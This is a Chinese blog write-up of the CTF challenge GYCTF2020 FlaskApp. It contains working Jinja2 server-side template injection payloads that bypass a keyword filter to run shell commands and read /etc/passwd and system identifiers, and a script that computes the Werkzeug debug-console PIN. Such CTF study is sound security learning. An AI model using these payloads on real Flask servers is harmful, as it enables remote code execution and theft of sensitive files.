[GYCTF2020]FlaskApp

最新推荐文章于 2024-07-13 16:30:52 发布
原创 最新推荐文章于 2024-07-13 16:30:52 发布 · 3.3k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #学习 #php #python #正则表达式

本文详细介绍了如何利用 SSTI(Server-Side Template Injection)注入来攻击 Flask Web 应用,通过读取系统文件获取敏感信息,并展示了计算 PIN 码的过程。同时提醒开发者注意不要在 Debug 模式下暴露敏感信息。

目录

进来有提示就看提示!摆烂的大动作!

计算pin码

我们可以查看/etc/passwd文件。使用如下命令

getattr(mod, ‘file’, None)flask目录下的app.py的绝对路径

当前电脑的MAC地址

机器的ID

总结:

进来有提示就看提示!摆烂的大动作!

 

入手点看来是失败了加密不可能失败,那就只能是解密失败了!解密失败后出现

 

debug模式,读取到了部分源码

@app.route('/decode',methods=['POST','GET'])
def decode():
    if request.values.get('text') :
        text = request.values.get("text")
        text_decode = base64.b64decode(text.encode())
        tmp = "结果 : {0}".format(text_decode.decode())
        if waf(tmp) :
            flash("no no no !!")
            return redirect(url_for('decode'))
        res =  render_template_string(tmp)

根据代码我们知道加密后的代码经过waf后会被直接渲染,想起来这个名字是flask,那么可能存在ssti注入了!

验证一下吧!加密{{1+1}}得到e3sxKzF9fQ==然后解密一下得到2说明存在ssti注入

简单fuzz后发现过滤了flag、import、os、eval等关键词,我们用拆分bypass!

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

加密后解密

拼接拿flag

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl"+"ag.txt").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

计算pin码

看到可以登录控制台同时,但是不太了解这个debug控制台的pin值,百度一下。好像这个是预期解。。想要拿到PIN码必须知道:

1.运行app的用户名,读/etc/passwd

2.module name 一般固定为flask.app

3.getattr(app, "\_\_name\_\_", app.\_\_class\_\_.\_\_name\_\_)的结果。就是Flask

4.flask库下app.py的绝对路径,不是当前运行的app.py的路径,在debug模式下报错就能直接看见,该题为/usr/local/lib/python3.7/site-packages/flask/app.py

5.当前网络的mac地址的十进制数。通过文件/sys/class/net/eth0/address读取,eth0为当前使用的网卡,如果有多个网卡数字可能会变,这里为02:42:ae:00:c3:58,转十进制为 2485410382680

6.机器的id
对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件,windows的id获取跟linux也不同,假如是在win平台下读取不到上面两个文件,就去获取注册表中SOFTWARE\Microsoft\Cryptography的值。对于docker机则读取/proc/self/cgroup,序列号为1那行
1:name=systemd:/docker/210b2177689514627fab120347f7d1ea1e986bed6a9ef57504e2e3ac22e38c3c

我们可以查看/etc/passwd文件。使用如下命令

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /etc/passwd").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/etc/passwd').read()}}

这两种都可以读取,这样我们可以知道是flaskweb用户。

getattr(mod, ‘file’, None)flask目录下的app.py的绝对路径

报错信息告诉我们

/usr/local/lib/python3.7/site-packages/flask/app.py

当前电脑的MAC地址

我们可以读取/sys/class/net/eth0/address来获得mac的16进制:

{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/sys/class/net/eth0/address').read()}}

得到a6:ac:19:45:f1:d8将其转10进制183258088600024许多工具都不准确,值得注意。可以采用本地用python跑的方式,在本地python输入

>>> print(int('a6ac1945f1d8',16))
183258088600024

机器的ID

读取/proc/self/cgroup获取get_machine_id()

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}

 

 
 

 
 
1:name=systemd:/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podcc096863_49c3_4caa_b633_05615b822d2b.slice/docker-b6ff692442683c70ab69d01d5310a9aba4d3014fc147c329891658c0e2048332
 

 

我们要的是
 

 
 
1:name=systemd:/docker-b6ff692442683c70ab69d01d5310a9aba4d3014fc147c329891658c0e2048332
 

 

计算PIN码:
 

import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
 
private_bits = [
    '2485377871838',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '4e2d4390ee2a9b57df253521f44301973efc74e35a300a02b4e509d60989543b'# get_machine_id(), /etc/machine-id
]
 
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
 
cookie_name = '__wzd' + h.hexdigest()[:20]
 
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
 
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
 
print(rv)
 

将得到的PIN码在Debug页面输入进入控制台,既可以执行python shell了:
 

os.popen('cat /this_is_the_flag.txt').read()
 

总结:
 

又见到了ssti注入,可以拼接绕过!
 

又学到了pin码计算,不要开启dubug模式
 

感谢buu提供优质的题,感谢勤劳的自己!

                

        

    

  



    



                



	

		

			

				
					
GYCTF2020 FlaskApp

				
			

			

				

					汗的博客
				

				

					09-04
					
					2037
					
				

			

		

		

			
				
GYCTF2020 FlaskApp,老规矩,还是buu的平台
知识点

flask的SSTI
ssti的绕过(拼接字符串,倒序切片,内置对象、函数)
pin码的生成

信息收集
因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能

提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的

直接报错抛出debug信息,看来是开启了debug模式
参见该文章:Flask开启debug模式等于给黑客留了后门
而且读到了app.py的部分代码
大致的

			
		

	



                

            
              



	

		

			

				
					
实例化Flask的参数 及 对app的配置

				
			

			

				

					weixin_33749242的博客
				

				

					08-20
					
					325
					
				

			

		

		

			
				
Flask 是一个非常灵活且短小精干的web框架 , 那么灵活性从什么地方体现呢?


有一个神奇的东西叫 Flask配置 , 这个东西怎么用呢? 它能给我们带来怎么样的方便呢?
首先展示一下:

from flask import Flask

app = Flask(__name__)  # type:Flask
app.config["DEBUG"] = Tru...

			
		

	



              


  
              

                


	

		

			

				
					
[GYCTF2020]FlaskApp 1

				
			

			

				

					ubaichu的博客
				

				

					07-13
					
					1316
					
				

			

		

		

			
				
[GYCTF2020]FlaskApp 1 详细解题过程

			
		

	





	

		

			

				
					
BUUCTF-[GYCTF2020]FlaskApp flask爆破pin

				
			

			

				

					m0_64180167的博客
				

				

					12-07
					
					1292
					
				

			

		

		

			
				
这道题不需要爆破也可以getshellssti都给你了但是学习记录一下pin的获取首先就是通过base加密后 当base64解密的时候 会造成ssfr这里过滤了 * 所以使用 {{7+7}} 实现然后我们开始看看源代码可以发现HINT 下存在pin所以是找pin这里我们开始在解密随便输入内容报错了 然后我们可以看源代码这里可以发现没啥内容 但是有waf首先通过读取读取一下/etc/passwd。

			
		

	



		

			
		



	

		

			

				
					
BUUCTF:[GYCTF2020]FlaskApp

				
			

			

				

					末初 · mochu7
				

				

					09-19
					
					2043
					
				

			

		

		

			
				
BUUCTF:[GYCTF2020]FlaskApp Writeup

			
		

	





	

		

			

				
					
flask-app-template, 一个完整的Flask 应用程序模板,带有有用的插件.zip

				
			

			

				

					09-17
				

			

		

		

			
				
flask-app-template, 一个完整的Flask 应用程序模板,带有有用的插件 Flask 应用程序模板用有用的插件为一个完整的Flask 应用程序模板提供 。 使用这里 Flask 应用程序来启动你的项目,减少工作量。 在这个应用程序模板中,你会发现已经配置了以下插件:瓶登录登录为 Flask 提供用户会话

			
		

	





	

		

			

				
					
web buuctf [GYCTF2020]FlaskApp

				
			

			

				

					weixin_44214568的博客
				

				

					04-12
					
					4672
					
				

			

		

		

			
				
知识点:1.flask的debug模式漏洞

       2.flask字符拼接漏洞

1.开题



2.提示flask了,那不得不试一试SSTI

在加密内输入{{7*7}} ,生成base64码e3s3Kjd9fcKg; 将e3s3Kjd9fcKg输入到解码框内,显示no no no说明存在防御

换一个输入{{7+7}},base64码为e3s3Kzd9fQ==,解码后,显示的是14

综上存在SSTI

3.看提示页面,没啥东西,在解密页面(因为解密存在SSTI)再随便输入些字母,...

			
		

	





	

		

			

				
					
Flask应用框架

				
			

			

				

					haiyang5233233的专栏
				

				

					01-09
					
					881
					
				

			

		

		

			
				
Flask是一个使用Python编写的轻量级 Web 应用框架。其WSGI工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。Flask使用 BSD 授权。

Flask也被称为 “microframework” ,因为它使用简单的核心,用 extension 增加其他功能。Flask没有默认使用的数据库、窗体验证工具

Flask是一个轻量级的可定制框架,使用Python语言...

			
		

	





	

		

			

				
					
buuoj  FlaskApp

					
最新发布

				
			

			

				

					03-18
				

			

		

		

			
				
### 关于 buuoj 和 FlaskApp 的信息

#### 1. **buuoj 平台简介**
`buuoj` 是一个在线渗透测试练习平台,专注于 Web 安全领域。它提供了多种类型的漏洞环境供学习者实践攻击与防御技术[^1]。该平台上的题目通常基于真实世界中的安全问题设计,例如 SQL 注入、XSS 跨站脚本攻击以及 SSRF 服务器端请求伪造等。

对于 `FlaskApp` 类型的题目,在 buuoj 中主要涉及 Python 的 Flask 框架开发的应用程序中存在的安全隐患分析。这些隐患可能来源于不恰当的输入验证机制或者模板引擎执行未过滤的内容等问题[^4]。

#### 2. **Flask 应用基础架构解析**
在构建 Flask 应用时,开发者常会利用 Jinja2 模板渲染页面数据。然而如果未能正确处理用户提交的数据,则可能导致诸如 SSTI (Server-Side Template Injection) 这样的严重威胁。下面是一个简单的例子展示如何通过恶意 payload 利用此类漏洞获取敏感文件内容:

```jinja
{% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__ == 'catch_warnings' %}
        {{ c.__init__.__globals__['__builtins__'].open('/flag', 'r').read() }}
    {% endif %}
{% endfor %}
```

上述代码片段展示了当应用程序允许动态加载类实例并访问其属性方法时所面临的风险。

#### 3. **GYCTF2020 FlaskApp 题目回顾**
根据 GYCTF2020 的一道名为 FlaskApp 的赛题描述可知,选手需要找到隐藏于应用内部逻辑里的 WAF 函数实现细节,并绕过防护措施完成特定目标。此过程不仅考验参赛者的逆向工程能力,同时也要求具备扎实的编程功底以便快速理解复杂业务流程。

以下是官方给出的一个简化版解决方案思路说明:
- 寻找是否存在可被滥用的功能接口;
- 尝试构造特殊字符串触发异常行为暴露更多线索;
- 结合已知条件推导最终答案路径。

实际操作过程中还需要注意避开显而易见的安全检测规则以免失败告终。

---

### 提供一段示例代码帮助初学者入门 Flask 开发

为了便于理解和后续深入研究,这里附上一份基本的 Flask 程序框架作为参考起点:

```python
from flask import Flask, render_template_string

app = Flask(__name__)

@app.route('/')
def index():
    return render_template_string('<h1>Hello World!</h1>')

if __name__ == '__main__':
    app.run(debug=True)
```

以上代码创建了一个最简形式的服务站点,默认监听本地地址并通过浏览器访问根目录即可看到欢迎消息显示效果[^2]。

---

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
姜小孩.

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值